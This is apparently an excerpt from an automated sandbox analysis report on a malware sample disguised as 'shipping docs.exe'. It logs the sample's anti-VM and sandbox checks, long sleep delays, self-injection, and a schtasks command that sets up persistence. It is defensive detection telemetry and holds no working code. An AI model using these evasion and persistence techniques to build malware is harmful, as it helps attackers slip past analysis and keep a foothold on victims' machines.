Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0000000E.00000002.343723068.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.365709519.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yVGAJfiVEvtg.exe PID: 4552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VMqTMMD.exe PID: 1280, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: shipping docs.exe, 00000000.00000002.265489624.0000000002481000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000004.00000002.365709519.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000E.00000002.343723068.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: shipping docs.exe, 00000000.00000002.265489624.0000000002481000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000004.00000002.365709519.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000E.00000002.343723068.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\shipping docs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\Desktop\shipping docs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\shipping docs.exe TID: 2292	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\shipping docs.exe TID: 1708	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Users\user\Desktop\shipping docs.exe TID: 6088	Thread sleep count: 9753 > 30
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe TID: 5596	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe TID: 3956	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe TID: 2092	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe TID: 4912	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe TID: 3324	Thread sleep count: 9727 > 30
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe TID: 908	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe TID: 1392	Thread sleep count: 9676 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\shipping docs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\shipping docs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\shipping docs.exe	Window / User API: threadDelayed 9753
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Window / User API: threadDelayed 9727
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Window / User API: threadDelayed 9676

Source: C:\Users\user\Desktop\shipping docs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\shipping docs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\shipping docs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\shipping docs.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\shipping docs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\shipping docs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Thread delayed: delay time: 922337203685477

Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: VMqTMMD.exe, 00000015.00000002.512897668.0000000001029000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllowerManagementCapabilities
Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: VMqTMMD.exe, 0000000F.00000002.374361259.0000000002D38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: shipping docs.exe, 00000003.00000002.514223306.0000000001202000.00000004.00000020.00020000.00000000.sdmp, shipping docs.exe, 00000003.00000003.309409191.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.552042956.0000000006640000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\shipping docs.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\shipping docs.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\shipping docs.exe

Code function: 3_2_0684DA38 LdrInitializeThunk,

Source: C:\Users\user\Desktop\shipping docs.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\shipping docs.exe	Memory written: C:\Users\user\Desktop\shipping docs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Memory written: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Memory written: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\shipping docs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp
Source: C:\Users\user\Desktop\shipping docs.exe	Process created: C:\Users\user\Desktop\shipping docs.exe {path}
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Process created: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe {path}
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp3418.tmp
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Process created: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe {path}

Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Users\user\Desktop\shipping docs.exe VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
